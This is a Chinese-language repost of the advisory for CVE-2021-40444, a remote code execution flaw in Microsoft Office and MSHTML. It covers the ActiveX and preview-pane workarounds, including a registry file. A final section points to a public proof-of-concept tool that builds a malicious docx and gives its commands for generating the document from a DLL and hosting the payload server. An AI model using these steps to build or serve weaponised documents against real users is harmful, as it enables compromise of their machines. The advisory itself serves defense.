微软Office Word远程代码执行漏洞|CVE-2021-40444

 [[425270]]

漏洞描述

  Microsoft 正在调查 MSHTML 中一个影响 Microsoft Windows 的远程代码执行漏洞的报告。Microsoft 发现,存在尝试通过特别设计的 Microsoft Office 文档利用此漏洞的针对性攻击。

  攻击者可制作一个由托管浏览器呈现引擎的 Microsoft Office 文档使用的恶意 ActiveX 控件。然后,攻击者必须诱使用户打开此恶意文件。在系统上配置为具有较少用户权限的用户帐户比具有管理员权限的用户帐户所受影响要小。

  Microsoft Defender 防病毒和 Microsoft Defender for Endpoint 均提供检测和防范已知漏洞的功能。客户应将反恶意软件产品保持最新状态。使用自动更新的客户不需要采取其他措施。管理更新的企业客户应当选择检测版本 1.349.22.0 或更新版本,以将其部署于整个用户环境中。Microsoft Defender for Endpoint 警报将显示为:“Suspicious Cpl File Execution”。

  完成此调查后,Microsoft 将采取有助于保护客户的适当措施。这可能包括,通过月度发布流程提供安全更新程序,或根据客户需求不定期提供安全更新程序。

  请参阅缓解措施和解决方法部分,以了解有关保护您的系统免受此漏洞影响之措施的重要信息。

  更新 2021 年 9 月 14 日:Microsoft 已发布安全更新来解决此漏洞。有关适用于您系统的更新,请参阅“安全更新”表。我们建议您立即安装这些更新。请参阅常见问题解答,以了解适用于您系统的重要信息。

  解决办法

  在 Internet Explorer 中禁用所有 ActiveX 控件可以缓解这种攻击。这可以通过使用“本地组策略编辑器”配置组策略或更新注册表在所有站点中实现。之前安装的 ActiveX 控件将继续运行,但是不会受此漏洞的影响。

  如需通过组策略禁用 ActiveX 控件。

  在组策略设置中,导航到计算机配置 > 管理模板 > Windows 组件 > Internet Explorer > Internet 控制面板 > 安全页面

  对于每个区域:

  1. 选择区域(Internet 区域、Intranet 区域、本地计算机区域或受信任的站点区域)。
  2. 双击下载签名的 ActiveX 控件并启用政策。然后将政策中的选项设置为停用。
  3. 双击下载未签名的 ActiveX 控件并启用政策。然后将政策中的选项设置为停用。

  我们建议将此设置应用至所有区域,以充分保护您的系统。

  变通办法的影响。

  这可将所有 64 位和 32 位进程的 Internet 区域的 URLACTION_DOWNLOAD_SIGNED_ACTIVEX (0x1001) 和 URLACTION_DOWNLOAD_UNSIGNED_ACTIVEX (0x1004) 设置为禁用 (3)。 新的 ActiveX 控件将不会安装。之前安装的 ActiveX 控件将继续运行。

  如需在单个系统中通过 RegKey 禁用 ActiveX 控件:

  警告如果您不正确地使用注册表编辑器,则可能会导致严重问题(您或许需要重新安装操作系统)。Microsoft 不保证您可以解决因错误使用注册表编辑器而产生的问题。使用注册表编辑器的风险由您自己承担。

  1. 如需在所有区域的 Internet Explorer 中禁用安装 ActiveX 控件,将以下内容粘贴到文本文件中,并使用 .reg 文件扩展名进行保存:
  1. Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]"1001"=dword:00000003"1004"=dword:00000003[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]"1001"=dword:00000003"1004"=dword:00000003[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]"1001"=dword:00000003"1004"=dword:00000003[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]"1001"=dword:00000003"1004"=dword:00000003 
  1. 双击 .reg 文件将其应用到您的策略配置单元中。
  2. 重新启动系统,以确保应用新配置。

  变通办法的影响。

  这可将所有 64 位和 32 位进程的 Internet 区域的 URLACTION_DOWNLOAD_SIGNED_ACTIVEX (0x1001) 和 URLACTION_DOWNLOAD_UNSIGNED_ACTIVEX (0x1004) 设置为禁用 (3)。 新的 ActiveX 控件将不会安装。之前安装的 ActiveX 控件将继续运行。

  如何撤消变通办法

  删除之前在实施变通办法过程中添加的注册表项。

  如需在 Windows Explorer 中禁用预览

  禁用 Shell Preview 可防止用户在 Windows Explorer 中预览文档。针对您想防止预览的各类文档,请执行以下步骤:

  1. 在注册表编辑器中,导航至合适的注册表项:

  对于 Word 文档:

  1. HKEY_CLASSES_ROOT.docx\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}HKEY_CLASSES_ROOT.doc\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f}HKEY_CLASSES_ROOT.docm\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f} 

  对于多格式文本文件:

  1. HKEY_CLASSES_ROOT.rtf\ShellEx{8895b1c6-b41f-4c1c-a562-0d564250836f} 
  1. 导出 RegKey 的副本以备份。
  2. 双击名称并在编辑字符串对话框中,删除“数值数据”。
  3. 单击确定。

  变通办法的影响

  用户将无法在 Windows Explorer 中预览文档。

  如何撤消变通办法

  双击您在变通办法步骤二中创建的 .reg 文件。

  常见问题解答

  “安全更新”表中列有适用于 Windows 8.1、Windows Server 2012 R2 和 Windows Server 2012 的三类更新。我需要在我的系统中安装什么更新来免受此漏洞的影响?

  运行 Windows 8.1、Windows Server 2012 R2 或 Windows Server 2012 的客户可应用下列选项之一:月度汇总或仅安全更新和 IE 累积更新。

  我运行的是 Windows 7、Windows Server 2008 R2 或 Windows Server 2008。我需要应用月度汇总和 IE 累积更新吗?

  • Windows 7、Windows Server 2008 R2 和 Windows Server 2008 的月度汇总中包含此漏洞的更新。应用月度汇总的客户无需再应用 IE 累积更新。
  • 只应用仅安全更新的客户还需要应用 IE 累积更新,以免受此漏洞的影响。

  CVE-2021-40444 PoC

  项目地址:

  GitHub: github.com/lockedbyte/CVE-2021-40444

  CVE-2021-40444(Microsoft Office Word 远程代码执行)恶意 docx 生成器利用工具 .

  此脚本的创建基于对野外使用的示例的一些逆向工程:

938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52(docx 文件)

  你需要先安装 lcab ( sudo apt-get install lcab)

  1. sudo apt-get install lcab 

  检查REPRODUCE.md手动复制步骤

  如果您生成的 cab 不起作用,请尝试将 exploit.html URL 指向 calc.cab

  使用方法

  首先生成一个给定 DLL 的恶意 docx 文档,您可以使用从调用中test/calc.dll弹出 a 的那个calc.exesystem ()

  1. python3 exploit.py generate test/calc.dll http://<SRV IP> 

  生成恶意 docx(将位于out/)后,您可以设置服务器

sudo python3 exploit.py host 80

  最后在 Windows 虚拟机中尝试 docx:打开 word 成功弹出计算器.

  poc 下载地址:

  https://github.com/lockedbyte/CVE-2021-40444

 

文章来源网络,作者:管理,如若转载,请注明出处:https://shuyeidc.com/wp/143805.html<

(0)
管理的头像管理
上一篇2025-03-09 21:08
下一篇 2025-03-09 21:10

相关推荐

  • 站群服务器和普通服务器到底哪个更适合GEO,怎么选?

    站群服务器更适合需要批量管理多个独立站点进行SEO的策略,而普通服务器在单站点权威性和稳定性上更优,但2026年百度对内容质量的要求让两者选择更依赖业务模式,站群服务器与普通服务器的核心差异定义与适用场景站群服务器本质是一台独享物理服务器,提供多个独立IP段(常为16、32或64个C段IP),每个IP绑定一个独……

    2026-07-28
    0
  • 物理服务器和云服务器做站群到底选哪个,哪个更稳定?

    做站群,物理服务器在核心指标上完全优于云服务器,尤其是对于追求稳定和长期排名的项目,物理服务器是唯一合理的选择,为什么物理服务器更适合站群站群的核心逻辑在于利用多个独立IP和站点,构建一个在网络中看似分散、但实际相互关联的矩阵,搜索引擎对IP关联性极其敏感,一旦检测到大量站点共享同一IP段或同一母机,惩罚风险会……

    2026-07-28
    0
  • 国内高防服务器哪家防御真实靠谱,怎么选?

    国内高防服务器哪家防御真实靠谱?答案很明确:只有那些持证上岗、自建机房、自己掌握清洗算法的服务商才靠得住,简米科技和酷番云就是这类代表,判断高防服务器真实防御能力的三个硬指标很多朋友选高防服务器,上来就问“你家多少G防御”,但数字背后水分很大,要判断防御是否真实,得看这三个方面:防御带宽是否独享? 有些服务商宣……

    2026-07-28
    0
  • 裸金属服务器和物理服务器有什么区别?,怎么选?

    裸金属服务器和物理服务器本质上是同一类硬件,核心区别在于交付逻辑和管理方式, 裸金属服务器是云服务商将物理服务器以云化方式交付,支持自动化部署、弹性伸缩和按需计费;而物理服务器通常指用户自购或托管,需要自行承担运维,两者在硬件层面完全相同,但业务模型和运维成本差异显著,裸金属服务器与物理服务器的定义差异裸金属服……

    2026-07-28
    0
  • 做GEO站群选哪家服务器服务商靠谱,怎么选?

    做SEO站群,选择服务器服务商的核心在于机房资质、IP资源与售后响应——简米科技与酷番云凭借持牌自营机房和多项权威认证,成为众多站群运营者的首选,站群服务器的高要求从何而来SEO站群依赖大量独立域名和IP地址,通过矩阵化布局获取长尾流量,搜索引擎对站群的识别逻辑越来越严,如果IP段集中、或服务器存在违规记录,很……

    2026-07-28
    0

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注